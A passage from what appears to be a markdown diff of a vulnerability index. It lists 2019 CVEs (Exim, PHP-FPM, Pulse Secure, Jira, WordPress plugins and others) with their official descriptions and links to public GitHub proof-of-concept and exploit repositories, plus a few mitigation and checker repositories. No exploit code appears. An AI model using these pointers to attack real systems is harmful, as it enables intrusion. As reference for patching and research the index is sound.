2.10.3, it is possible to bypass the CORS protection mechanism via a "null" origin value, potentially leading to XSS. + + +- [mpgn/CVE-2019-9580](https://github.com/mpgn/CVE-2019-9580) + +### CVE-2019-9596 (2019-10-23) + +Darktrace Enterprise Immune System before 3.1 allows CSRF via the /whitelisteddomains endpoint. + + +- [gerwout/CVE-2019-9596-and-CVE-2019-9597](https://github.com/gerwout/CVE-2019-9596-and-CVE-2019-9597) + +### CVE-2019-9599 (2019-03-06) + +The AirDroid application through 4.2.1.6 for Android allows remote attackers to cause a denial of service (service crash) via many simultaneous sdctl/comm/lite_auth/ requests. + + +- [s4vitar/AirDroidPwner](https://github.com/s4vitar/AirDroidPwner) + +### CVE-2019-9621 (2019-04-30) + +Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via the ProxyServlet component. + + +- [k8gege/ZimbraExploit](https://github.com/k8gege/ZimbraExploit) + +### CVE-2019-9653 (2019-05-31) + +NUUO Network Video Recorder Firmware 1.7.x through 3.3.x allows unauthenticated attackers to execute arbitrary commands via shell metacharacters to handle_load_config.php. + + +- [grayoneday/CVE-2019-9653](https://github.com/grayoneday/CVE-2019-9653) + +### CVE-2019-9670 (2019-05-29) + +mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability, as demonstrated by Autodiscover/Autodiscover.xml. + + +- [rek7/Zimbra-RCE](https://github.com/rek7/Zimbra-RCE) +- [attackgithub/Zimbra-RCE](https://github.com/attackgithub/Zimbra-RCE) +- [oppsec/arbimz](https://github.com/oppsec/arbimz) +- [oppsec/zaber](https://github.com/oppsec/zaber) +- [Cappricio-Securities/CVE-2019-9670](https://github.com/Cappricio-Securities/CVE-2019-9670) +- [OracleNep/CVE-2019-9670-DtdFilegeneration](https://github.com/OracleNep/CVE-2019-9670-DtdFilegeneration) + +### CVE-2019-9673 (2019-06-05) + +Freenet 1483 has a MIME type bypass that allows arbitrary JavaScript execution via a crafted Freenet URI. + + +- [mgrube/CVE-2019-9673](https://github.com/mgrube/CVE-2019-9673) + +### CVE-2019-9729 (2019-03-12) + +In Shanda MapleStory Online V160, the SdoKeyCrypt.sys driver allows privilege escalation to NT AUTHORITY\SYSTEM because of not validating the IOCtl 0x8000c01c input value, leading to an integer signedness error and a heap-based buffer underflow. + + +- [HyperSine/SdoKeyCrypt-sys-local-privilege-elevation](https://github.com/HyperSine/SdoKeyCrypt-sys-local-privilege-elevation) +- [timeowilliamsq/HyperSine](https://github.com/timeowilliamsq/HyperSine) +- [recozone/HyperSine](https://github.com/recozone/HyperSine) +- [huangyutange0uywlcn/HyperSine](https://github.com/huangyutange0uywlcn/HyperSine) + +### CVE-2019-9730 (2019-06-05) + +Incorrect access control in the CxUtilSvc component of the Synaptics Sound Device drivers prior to version 2.29 allows a local attacker to increase access privileges to the Windows Registry via an unpublished API. + + +- [jthuraisamy/CVE-2019-9730](https://github.com/jthuraisamy/CVE-2019-9730) + +### CVE-2019-9745 (2019-10-14) + +CloudCTI HIP Integrator Recognition Configuration Tool allows privilege escalation via its EXQUISE integration. This tool communicates with a service (Recognition Update Client Service) via an insecure communication channel (Named Pipe). The data (JSON) sent via this channel is used to import data from CRM software using plugins (.dll files). The plugin to import data from the EXQUISE software (DatasourceExquiseExporter.dll) can be persuaded to start arbitrary programs (including batch files) that are executed using the same privileges as Recognition Update Client Service (NT AUTHORITY\SYSTEM), thus elevating privileges. This occurs because a higher-privileged process executes scripts from a directory writable by a lower-privileged user. + + +- [KPN-CISO/CVE-2019-9745](https://github.com/KPN-CISO/CVE-2019-9745) + +### CVE-2019-9766 (2019-03-14) + +Stack-based buffer overflow in Free MP3 CD Ripper 2.6, when converting a file, allows user-assisted remote attackers to execute arbitrary code via a crafted .mp3 file. + + +- [moonheadobj/CVE-2019-9766](https://github.com/moonheadobj/CVE-2019-9766) +- [zeronohacker/CVE-2019-9766](https://github.com/zeronohacker/CVE-2019-9766) + +### CVE-2019-9787 (2019-03-14) + +WordPress before 5.1.1 does not properly filter comment content, leading to Remote Code Execution by unauthenticated users in a default configuration. This occurs because CSRF protection is mishandled, and because Search Engine Optimization of A elements is performed incorrectly, leading to XSS. The XSS results in administrative access, which allows arbitrary changes to .php files. This is related to wp-admin/includes/ajax-actions.php and wp-includes/comment.php. + + +- [rkatogit/cve-2019-9787_csrf_poc](https://github.com/rkatogit/cve-2019-9787_csrf_poc) +- [PalmTreeForest/CodePath_Week_7-8](https://github.com/PalmTreeForest/CodePath_Week_7-8) +- [sijiahi/Wordpress_cve-2019-9787_defense](https://github.com/sijiahi/Wordpress_cve-2019-9787_defense) +- [matinciel/Wordpress_CVE-2019-9787](https://github.com/matinciel/Wordpress_CVE-2019-9787) +- [dexXxed/CVE-2019-9787](https://github.com/dexXxed/CVE-2019-9787) +- [kuangting4231/mitigation-cve-2019-9787](https://github.com/kuangting4231/mitigation-cve-2019-9787) + +### CVE-2019-9791 (2019-04-26) + +The type inference system allows the compilation of functions that can cause type confusions between arbitrary objects when compiled through the IonMonkey just-in-time (JIT) compiler and when the constructor function is entered through on-stack replacement (OSR). This allows for possible arbitrary reading and writing of objects during an exploitable crash. This vulnerability affects Thunderbird < 60.6, Firefox ESR < 60.6, and Firefox < 66. + + +- [Sp0pielar/CVE-2019-9791](https://github.com/Sp0pielar/CVE-2019-9791) + +### CVE-2019-9810 (2019-04-26) + +Incorrect alias information in IonMonkey JIT compiler for Array.prototype.slice method may lead to missing bounds check and a buffer overflow. This vulnerability affects Firefox < 66.0.1, Firefox ESR < 60.6.1, and Thunderbird < 60.6.1. + + +- [xuechiyaobai/CVE-2019-9810-PoC](https://github.com/xuechiyaobai/CVE-2019-9810-PoC) +- [0vercl0k/CVE-2019-9810](https://github.com/0vercl0k/CVE-2019-9810) + +### CVE-2019-9849 (2019-07-17) + +LibreOffice has a 'stealth mode' in which only documents from locations deemed 'trusted' are allowed to retrieve remote resources. This mode is not the default mode, but can be enabled by users who want to disable LibreOffice's ability to include remote resources within a document. A flaw existed where bullet graphics were omitted from this protection prior to version 6.2.5. This issue affects: Document Foundation LibreOffice versions prior to 6.2.5. + + +- [mbadanoiu/CVE-2019-9849](https://github.com/mbadanoiu/CVE-2019-9849) + +### CVE-2019-9896 (2019-03-21) + +In PuTTY versions before 0.71 on Windows, local attackers could hijack the application by putting a malicious help file in the same directory as the executable. + + +- [yasinyilmaz/vuln-chm-hijack](https://github.com/yasinyilmaz/vuln-chm-hijack) + +### CVE-2019-9978 (2019-03-24) + +The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro. + + +- [mpgn/CVE-2019-9978](https://github.com/mpgn/CVE-2019-9978) +- [hash3liZer/CVE-2019-9978](https://github.com/hash3liZer/CVE-2019-9978) +- [KTN1990/CVE-2019-9978](https://github.com/KTN1990/CVE-2019-9978) +- [cved-sources/cve-2019-9978](https://github.com/cved-sources/cve-2019-9978) +- [d3fudd/CVE-2019-9978_Exploit](https://github.com/d3fudd/CVE-2019-9978_Exploit) +- [grimlockx/CVE-2019-9978](https://github.com/grimlockx/CVE-2019-9978) +- [h8handles/CVE-2019-9978-Python3](https://github.com/h8handles/CVE-2019-9978-Python3) +- [0xMoonrise/cve-2019-9978](https://github.com/0xMoonrise/cve-2019-9978) +- [MAHajian/CVE-2019-9978](https://github.com/MAHajian/CVE-2019-9978) + +### CVE-2019-10008 (2019-04-24) + +Zoho ManageEngine ServiceDesk 9.3 allows session hijacking and privilege escalation because an established guest session is automatically converted into an established administrator session when the guest user enters the administrator username, with an arbitrary incorrect password, in an mc/ login attempt within a different browser tab. + + +- [ignis-sec/CVE-2019-10008](https://github.com/ignis-sec/CVE-2019-10008) + +### CVE-2019-10086 (2019-08-20) + +In Apache Commons Beanutils 1.9.2, a special BeanIntrospector class was added which allows suppressing the ability for an attacker to access the classloader via the class property available on all Java objects. We, however were not using this by default characteristic of the PropertyUtilsBean. + + +- [evilangelplus/CVE-2019-10086](https://github.com/evilangelplus/CVE-2019-10086) + +### CVE-2019-10092 (2019-09-26) + +In Apache HTTP Server 2.4.0-2.4.39, a limited cross-site scripting issue was reported affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed. + + +- [motikan2010/CVE-2019-10092_Docker](https://github.com/motikan2010/CVE-2019-10092_Docker) +- [mbadanoiu/CVE-2019-10092](https://github.com/mbadanoiu/CVE-2019-10092) + +### CVE-2019-10149 (2019-06-05) + +A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution. + + +- [bananaphones/exim-rce-quickfix](https://github.com/bananaphones/exim-rce-quickfix) +- [cowbe0x004/eximrce-CVE-2019-10149](https://github.com/cowbe0x004/eximrce-CVE-2019-10149) +- [MNEMO-CERT/PoC--CVE-2019-10149_Exim](https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim) +- [aishee/CVE-2019-10149-quick](https://github.com/aishee/CVE-2019-10149-quick) +- [AzizMea/CVE-2019-10149-privilege-escalation](https://github.com/AzizMea/CVE-2019-10149-privilege-escalation) +- [Brets0150/StickyExim](https://github.com/Brets0150/StickyExim) +- [Chris-dev1/exim.exp](https://github.com/Chris-dev1/exim.exp) +- [darsigovrustam/CVE-2019-10149](https://github.com/darsigovrustam/CVE-2019-10149) +- [Diefunction/CVE-2019-10149](https://github.com/Diefunction/CVE-2019-10149) +- [Dilshan-Eranda/CVE-2019-10149](https://github.com/Dilshan-Eranda/CVE-2019-10149) +- [cloudflare/exim-cve-2019-10149-data](https://github.com/cloudflare/exim-cve-2019-10149-data) +- [Stick-U235/CVE-2019-10149-Exploit](https://github.com/Stick-U235/CVE-2019-10149-Exploit) +- [rahmadsandy/EXIM-4.87-CVE-2019-10149](https://github.com/rahmadsandy/EXIM-4.87-CVE-2019-10149) +- [hyim0810/CVE-2019-10149](https://github.com/hyim0810/CVE-2019-10149) +- [qlusec/CVE-2019-10149](https://github.com/qlusec/CVE-2019-10149) +- [uyerr/PoC_CVE-2019-10149--rce](https://github.com/uyerr/PoC_CVE-2019-10149--rce) + +### CVE-2019-10172 (2019-11-18) + +A flaw was found in org.codehaus.jackson:jackson-mapper-asl:1.9.x libraries. XML external entity vulnerabilities similar CVE-2016-3720 also affects codehaus jackson-mapper-asl libraries but in different classes. + + +- [rusakovichma/CVE-2019-10172](https://github.com/rusakovichma/CVE-2019-10172) + +### CVE-2019-10207 (2019-11-25) + +A flaw was found in the Linux kernel's Bluetooth implementation of UART, all versions kernel 3.x.x before 4.18.0 and kernel 5.x.x. An attacker with local access and write permissions to the Bluetooth hardware could use this flaw to issue a specially crafted ioctl function call and cause the system to crash. + + +- [butterflyhack/CVE-2019-10207](https://github.com/butterflyhack/CVE-2019-10207) + +### CVE-2019-10220 (2019-11-27) + +Linux kernel CIFS implementation, version 4.9.0 is vulnerable to a relative paths injection in directory entry lists. + + +- [Trinadh465/linux-3.0.35_CVE-2019-10220](https://github.com/Trinadh465/linux-3.0.35_CVE-2019-10220) +- [hshivhare67/kernel_v4.1.15_CVE-2019-10220](https://github.com/hshivhare67/kernel_v4.1.15_CVE-2019-10220) + +### CVE-2019-10392 (2019-09-12) + +Jenkins Git Client Plugin 2.8.4 and earlier and 3.0.0-rc did not properly restrict values passed as URL argument to an invocation of 'git ls-remote', resulting in OS command injection. + + +- [jas502n/CVE-2019-10392](https://github.com/jas502n/CVE-2019-10392) +- [ftk-sostupid/CVE-2019-10392_EXP](https://github.com/ftk-sostupid/CVE-2019-10392_EXP) + +### CVE-2019-10475 (2019-10-23) + +A reflected cross-site scripting vulnerability in Jenkins build-metrics Plugin allows attackers to inject arbitrary HTML and JavaScript into web pages provided by this plugin. + + +- [vesche/CVE-2019-10475](https://github.com/vesche/CVE-2019-10475) + +### CVE-2019-10678 (2019-03-31) + +Domoticz before 4.10579 neglects to categorize \n and \r as insecure argument options. + + +- [cved-sources/cve-2019-10678](https://github.com/cved-sources/cve-2019-10678) + +### CVE-2019-10685 (2019-05-24) + +A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Heidelberg Prinect Archiver v2013 release 1.0. + + +- [alt3kx/CVE-2019-10685](https://github.com/alt3kx/CVE-2019-10685) + +### CVE-2019-10708 (2019-04-02) + +S-CMS PHP v1.0 has SQL injection via the 4/js/scms.php?action=unlike id parameter. + + +- [stavhaygn/CVE-2019-10708](https://github.com/stavhaygn/CVE-2019-10708) + +### CVE-2019-10742 (2019-05-07) + +Axios up to and including 0.18.0 allows attackers to cause a denial of service (application crash) by continuing to accepting content after maxContentLength is exceeded. + + +- [Viniciuspxf/CVE-2019-10742](https://github.com/Viniciuspxf/CVE-2019-10742) + +### CVE-2019-10758 (2019-12-24) + +mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform `exec` commands in a non-safe environment. + + +- [masahiro331/CVE-2019-10758](https://github.com/masahiro331/CVE-2019-10758) +- [lp008/CVE-2019-10758](https://github.com/lp008/CVE-2019-10758) + +### CVE-2019-10760 (2019-10-15) + +safer-eval before 1.3.2 are vulnerable to Arbitrary Code Execution. A payload using constructor properties can escape the sandbox and execute arbitrary code. + + +- [lirantal/safer-eval-cve-CVE-2019-10760](https://github.com/lirantal/safer-eval-cve-CVE-2019-10760) + +### CVE-2019-10779 (2020-01-28) + +All versions of stroom:stroom-app before 5.5.12 and all versions of the 6.0.0 branch before 6.0.25 are affected by Cross-site Scripting. An attacker website is able to load the Stroom UI into a hidden iframe. Using that iframe, the attacker site can issue commands to the Stroom UI via an XSS vulnerability to take full control of the Stroom UI on behalf of the logged-in user. + + +- [RepublicR0K/CVE-2019-10779](https://github.com/RepublicR0K/CVE-2019-10779) + +### CVE-2019-10869 (2019-05-07) + +Path Traversal and Unrestricted File Upload exists in the Ninja Forms plugin before 3.0.23 for WordPress (when the Uploads add-on is activated). This allows an attacker to traverse the file system to access files and execute code via the includes/fields/upload.php (aka upload/submit page) name and tmp_name parameters. + + +- [KTN1990/CVE-2019-10869](https://github.com/KTN1990/CVE-2019-10869) + +### CVE-2019-10915 (2019-07-11) + +A vulnerability has been identified in TIA Administrator (All versions < V1.0 SP1 Upd1). The integrated configuration web application (TIA Administrator) allows to execute certain application commands without proper authentication. The vulnerability could be exploited by an attacker with local access to the affected system. Successful exploitation requires no privileges and no user interaction. An attacker could use the vulnerability to compromise confidentiality and integrity and availability of the affected system. At the time of advisory publication no public exploitation of this security vulnerability was known. + + +- [jiansiting/CVE-2019-10915](https://github.com/jiansiting/CVE-2019-10915) + +### CVE-2019-10945 (2019-04-10) + +An issue was discovered in Joomla! before 3.9.5. The Media Manager component does not properly sanitize the folder parameter, allowing attackers to act outside the media manager root directory. + + +- [dpgg101/CVE-2019-10945](https://github.com/dpgg101/CVE-2019-10945) + +### CVE-2019-10999 (2019-05-06) + +The D-Link DCS series of Wi-Fi cameras contains a stack-based buffer overflow in alphapd, the camera's web server. The overflow allows a remotely authenticated attacker to execute arbitrary code by providing a long string in the WEPEncryption parameter when requesting wireless.htm. Vulnerable devices include DCS-5009L (1.08.11 and below), DCS-5010L (1.14.09 and below), DCS-5020L (1.15.12 and below), DCS-5025L (1.03.07 and below), DCS-5030L (1.04.10 and below), DCS-930L (2.16.01 and below), DCS-931L (1.14.11 and below), DCS-932L (2.17.01 and below), DCS-933L (1.14.11 and below), and DCS-934L (1.05.04 and below). + + +- [tacnetsol/CVE-2019-10999](https://github.com/tacnetsol/CVE-2019-10999) +- [qjh2333/CVE-2019-10999](https://github.com/qjh2333/CVE-2019-10999) + +### CVE-2019-11043 (2019-10-28) + +In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution. + + +- [neex/phuip-fpizdam](https://github.com/neex/phuip-fpizdam) +- [B1gd0g/CVE-2019-11043](https://github.com/B1gd0g/CVE-2019-11043) +- [tinker-li/CVE-2019-11043](https://github.com/tinker-li/CVE-2019-11043) +- [jas502n/CVE-2019-11043](https://github.com/jas502n/CVE-2019-11043) +- [AleWong/PHP-FPM-Remote-Code-Execution-Vulnerability-CVE-2019-11043-](https://github.com/AleWong/PHP-FPM-Remote-Code-Execution-Vulnerability-CVE-2019-11043-) +- [ianxtianxt/CVE-2019-11043](https://github.com/ianxtianxt/CVE-2019-11043) +- [fairyming/CVE-2019-11043](https://github.com/fairyming/CVE-2019-11043) +- [akamajoris/CVE-2019-11043-Docker](https://github.com/akamajoris/CVE-2019-11043-Docker) +- [theMiddleBlue/CVE-2019-11043](https://github.com/theMiddleBlue/CVE-2019-11043) +- [shadow-horse/cve-2019-11043](https://github.com/shadow-horse/cve-2019-11043) +- [huowen/CVE-2019-11043](https://github.com/huowen/CVE-2019-11043) +- [ypereirareis/docker-CVE-2019-11043](https://github.com/ypereirareis/docker-CVE-2019-11043) +- [MRdoulestar/CVE-2019-11043](https://github.com/MRdoulestar/CVE-2019-11043) +- [0th3rs-Security-Team/CVE-2019-11043](https://github.com/0th3rs-Security-Team/CVE-2019-11043) +- [k8gege/CVE-2019-11043](https://github.com/k8gege/CVE-2019-11043) +- [moniik/CVE-2019-11043_env](https://github.com/moniik/CVE-2019-11043_env) +- [kriskhub/CVE-2019-11043](https://github.com/kriskhub/CVE-2019-11043) +- [alokaranasinghe/cve-2019-11043](https://github.com/alokaranasinghe/cve-2019-11043) +- [corifeo/CVE-2019-11043](https://github.com/corifeo/CVE-2019-11043) +- [lindemer/CVE-2019-11043](https://github.com/lindemer/CVE-2019-11043) +- [jptr218/php_hack](https://github.com/jptr218/php_hack) +- [jas9reet/CVE-2019-11043](https://github.com/jas9reet/CVE-2019-11043) + +### CVE-2019-11061 (2019-08-29) + +A broken access control vulnerability in HG100 firmware versions up to 4.00.06 allows an attacker in the same local area network to control IoT devices that connect with itself via http://[target]/smarthome/devicecontrol without any authentication. CVSS 3.0 base score 10 (Confidentiality, Integrity and Availability impacts). CVSS vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). + + +- [tim124058/ASUS-SmartHome-Exploit](https://github.com/tim124058/ASUS-SmartHome-Exploit) + +### CVE-2019-11076 (2019-04-23) + +Cribl UI 1.5.0 allows remote attackers to run arbitrary commands via an unauthenticated web request. + + +- [livehybrid/poc-cribl-rce](https://github.com/livehybrid/poc-cribl-rce) + +### CVE-2019-11157 (2019-12-16) + +Improper conditions check in voltage settings for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege and/or information disclosure via local access. + + +- [zkenjar/v0ltpwn](https://github.com/zkenjar/v0ltpwn) + +### CVE-2019-11223 (2019-04-18) + +An Unrestricted File Upload Vulnerability in the SupportCandy plugin through 2.0.0 for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension. + + +- [AngelCtulhu/CVE-2019-11223](https://github.com/AngelCtulhu/CVE-2019-11223) + +### CVE-2019-11224 (2019-05-15) + +HARMAN AMX MVP5150 v2.87.13 devices allow remote OS Command Injection. + + +- [Insecurities/CVE-2019-11224](https://github.com/Insecurities/CVE-2019-11224) + +### CVE-2019-11358 (2019-04-19) + +jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype. + + +- [DanielRuf/snyk-js-jquery-174006](https://github.com/DanielRuf/snyk-js-jquery-174006) +- [bitnesswise/jquery-prototype-pollution-fix](https://github.com/bitnesswise/jquery-prototype-pollution-fix) +- [DanielRuf/snyk-js-jquery-565129](https://github.com/DanielRuf/snyk-js-jquery-565129) +- [chrisneagu/FTC-Skystone-Dark-Angels-Romania-2020](https://github.com/chrisneagu/FTC-Skystone-Dark-Angels-Romania-2020) +- [Snorlyd/https-nj.gov---CVE-2019-11358](https://github.com/Snorlyd/https-nj.gov---CVE-2019-11358) +- [isacaya/CVE-2019-11358](https://github.com/isacaya/CVE-2019-11358) + +### CVE-2019-11395 (2019-04-21) + +A buffer overflow in MailCarrier 2.51 allows remote attackers to execute arbitrary code via a long string, as demonstrated by SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP, or POP3 RETR. + + +- [RedAlien00/CVE-2019-11395](https://github.com/RedAlien00/CVE-2019-11395) +- [caioprince/CVE-2019-11395](https://github.com/caioprince/CVE-2019-11395) + +### CVE-2019-11408 (2019-06-17) + +XSS in app/operator_panel/index_inc.php in the Operator Panel module in FusionPBX 4.4.3 allows remote unauthenticated attackers to inject arbitrary JavaScript characters by placing a phone call using a specially crafted caller ID number. This can further lead to remote code execution by chaining this vulnerability with a command injection vulnerability also present in FusionPBX. + + +- [HoseynHeydari/fusionpbx_rce_vulnerability](https://github.com/HoseynHeydari/fusionpbx_rce_vulnerability) + +### CVE-2019-11447 (2019-04-22) + +An issue was discovered in CutePHP CuteNews 2.1.2. An attacker can infiltrate the server through the avatar upload process in the profile area via the avatar_file field to index.php?mod=main&opt=personal. There is no effective control of $imgsize in /core/modules/dashboard.php. The header content of a file can be changed and the control can be bypassed for code execution. (An attacker can use the GIF header for this.) + + +- [mt-code/CVE-2019-11447](https://github.com/mt-code/CVE-2019-11447) +- [khuntor/CVE-2019-11447-EXP](https://github.com/khuntor/CVE-2019-11447-EXP) +- [dinesh876/CVE-2019-11447-POC](https://github.com/dinesh876/CVE-2019-11447-POC) +- [ColdFusionX/CVE-2019-11447_CuteNews-AvatarUploadRCE](https://github.com/ColdFusionX/CVE-2019-11447_CuteNews-AvatarUploadRCE) +- [thewhiteh4t/cve-2019-11447](https://github.com/thewhiteh4t/cve-2019-11447) +- [0xConstant/CVE-2019-11447](https://github.com/0xConstant/CVE-2019-11447) +- [substing/CVE-2019-11447_reverse_shell_upload](https://github.com/substing/CVE-2019-11447_reverse_shell_upload) +- [CRFSlick/CVE-2019-11447-POC](https://github.com/CRFSlick/CVE-2019-11447-POC) +- [ojo5/CVE-2019-11447.c](https://github.com/ojo5/CVE-2019-11447.c) + +### CVE-2019-11477 (2019-06-18) + +Jonathan Looney discovered that the TCP_SKB_CB(skb)->tcp_gso_segs value was subject to an integer overflow in the Linux kernel when handling TCP Selective Acknowledgments (SACKs). A remote attacker could use this to cause a denial of service. This has been fixed in stable kernel releases 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, and is fixed in commit 3b4929f65b0d8249f19a50245cd88ed1a2f78cff. + + +- [sasqwatch/cve-2019-11477-poc](https://github.com/sasqwatch/cve-2019-11477-poc) + +### CVE-2019-11510 (2019-05-08) + +In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability . + + +- [projectzeroindia/CVE-2019-11510](https://github.com/projectzeroindia/CVE-2019-11510) +- [nuc13us/Pulse](https://github.com/nuc13us/Pulse) +- [imjdl/CVE-2019-11510-poc](https://github.com/imjdl/CVE-2019-11510-poc) +- [es0/CVE-2019-11510_poc](https://github.com/es0/CVE-2019-11510_poc) +- [r00tpgp/http-pulse_ssl_vpn.nse](https://github.com/r00tpgp/http-pulse_ssl_vpn.nse) +- [jas502n/CVE-2019-11510-1](https://github.com/jas502n/CVE-2019-11510-1) +- [jason3e7/CVE-2019-11510](https://github.com/jason3e7/CVE-2019-11510) +- [BishopFox/pwn-pulse](https://github.com/BishopFox/pwn-pulse) +- [aqhmal/pulsexploit](https://github.com/aqhmal/pulsexploit) +- [cisagov/check-your-pulse](https://github.com/cisagov/check-your-pulse) +- [andripwn/pulse-exploit](https://github.com/andripwn/pulse-exploit) +- [pwn3z/CVE-2019-11510-PulseVPN](https://github.com/pwn3z/CVE-2019-11510-PulseVPN) +- [34zY/APT-Backpack](https://github.com/34zY/APT-Backpack) + +### CVE-2019-11523 (2019-06-06) + +Anviz Global M3 Outdoor RFID Access Control executes any command received from any source. No authentication/encryption is done. Attackers can fully interact with the device: for example, send the "open door" command, download the users list (which includes RFID codes and passcodes in cleartext), or update/create users. The same attack can be executed on a local network and over the internet (if the device is exposed on a public IP address). + + +- [wizlab-it/anviz-m3-rfid-cve-2019-11523-poc](https://github.com/wizlab-it/anviz-m3-rfid-cve-2019-11523-poc) + +### CVE-2019-11539 (2019-04-26) + +In Pulse Secure Pulse Connect Secure version 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, and 8.1RX before 8.1R15.1 and Pulse Policy Secure version 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, 5.3RX before 5.3R12.1, 5.2RX before 5.2R12.1, and 5.1RX before 5.1R15.1, the admin web interface allows an authenticated attacker to inject and execute commands. + + +- [0xDezzy/CVE-2019-11539](https://github.com/0xDezzy/CVE-2019-11539) + +### CVE-2019-11580 (2019-06-03) + +Atlassian Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability. + + +- [jas502n/CVE-2019-11580](https://github.com/jas502n/CVE-2019-11580) +- [shelld3v/CVE-2019-11580](https://github.com/shelld3v/CVE-2019-11580) + +### CVE-2019-11581 (2019-08-09) + +There was a server-side template injection vulnerability in Jira Server and Data Center, in the ContactAdministrators and the SendBulkMail actions. An attacker is able to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center. All versions of Jira Server and Data Center from 4.4.0 before 7.6.14, from 7.7.0 before 7.13.5, from 8.0.0 before 8.0.3, from 8.1.0 before 8.1.2, and from 8.2.0 before 8.2.3 are affected by this vulnerability. + + +- [jas502n/CVE-2019-11581](https://github.com/jas502n/CVE-2019-11581) +- [kobs0N/CVE-2019-11581](https://github.com/kobs0N/CVE-2019-11581) +- [PetrusViet/CVE-2019-11581](https://github.com/PetrusViet/CVE-2019-11581) + +### CVE-2019-11687 (2019-05-02) + +An issue was discovered in the DICOM Part 10 File Format in the NEMA DICOM Standard 1995 through 2019b. The preamble of a DICOM file that complies with this specification can contain the header for an executable file, such as Portable Executable (PE) malware. This space is left unspecified so that dual-purpose files can be created. (For example, dual-purpose TIFF/DICOM files are used in digital whole slide imaging for applications in medicine.) To exploit this vulnerability, someone must execute a maliciously crafted file that is encoded in the DICOM Part 10 File Format. PE/DICOM files are executable even with the .dcm file extension. Anti-malware configurations at healthcare facilities often ignore medical imagery. Also, anti-malware tools and business processes could violate regulatory frameworks (such as HIPAA) when processing suspicious DICOM files. + + +- [kosmokato/bad-dicom](https://github.com/kosmokato/bad-dicom) + +### CVE-2019-11707 (2019-07-23) + +A type confusion vulnerability can occur when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash. We are aware of targeted attacks in the wild abusing this flaw. This vulnerability affects Firefox ESR < 60.7.1, Firefox < 67.0.3, and Thunderbird < 60.7.2. + + +- [vigneshsrao/CVE-2019-11707](https://github.com/vigneshsrao/CVE-2019-11707) +- [flabbergastedbd/cve-2019-11707](https://github.com/flabbergastedbd/cve-2019-11707) + +### CVE-2019-11708 (2019-07-23) + +Insufficient vetting of parameters passed with the Prompt:Open IPC message between child and parent processes can result in the non-sandboxed parent process opening web content chosen by a compromised child process. When combined with additional vulnerabilities this could result in executing arbitrary code on the user's computer. This vulnerability affects Firefox ESR < 60.7.2, Firefox < 67.0.4, and Thunderbird < 60.7.2. + + +- [0vercl0k/CVE-2019-11708](https://github.com/0vercl0k/CVE-2019-11708) + +### CVE-2019-11730 (2019-07-23) + +A vulnerability exists where if a user opens a locally saved HTML file, this file can use file: URIs to access other files in the same directory or sub-directories if the names are known or guessed. The Fetch API can then be used to read the contents of any files stored in these directories and they may uploaded to a server. It was demonstrated that in combination with a popular Android messaging app, if a malicious HTML attachment is sent to a user and they opened that attachment in Firefox, due to that app's predictable pattern for locally-saved file names, it is possible to read attachments the victim received from other correspondents. This vulnerability affects Firefox ESR < 60.8, Firefox < 68, and Thunderbird < 60.8. + + +- [lihuaiqiu/CVE-2019-11730](https://github.com/lihuaiqiu/CVE-2019-11730) + +### CVE-2019-11869 (2019-05-09) + +The Yuzo Related Posts plugin 5.12.94 for WordPress has XSS because it mistakenly expects that is_admin() verifies that the request comes from an admin user (it actually only verifies that the request is for an admin page). An unauthenticated attacker can inject a payload into the plugin settings, such as the yuzo_related_post_css_and_style setting. + + +- [rix4uni/CVE-2019-11869](https://github.com/rix4uni/CVE-2019-11869) +- [gitrecon1455/CVE-2019-11869](https://github.com/gitrecon1455/CVE-2019-11869) + +### CVE-2019-11881 (2019-06-10) + +A vulnerability exists in Rancher 2.1.4 in the login component, where the errorMsg parameter can be tampered to display arbitrary content, filtering tags but not special characters or symbols. There's no other limitation of the message, allowing malicious users to lure legitimate users to visit phishing sites with scare tactics, e.g., displaying a "This version of Rancher is outdated, please visit https://malicious.rancher.site/upgrading" message. + + +- 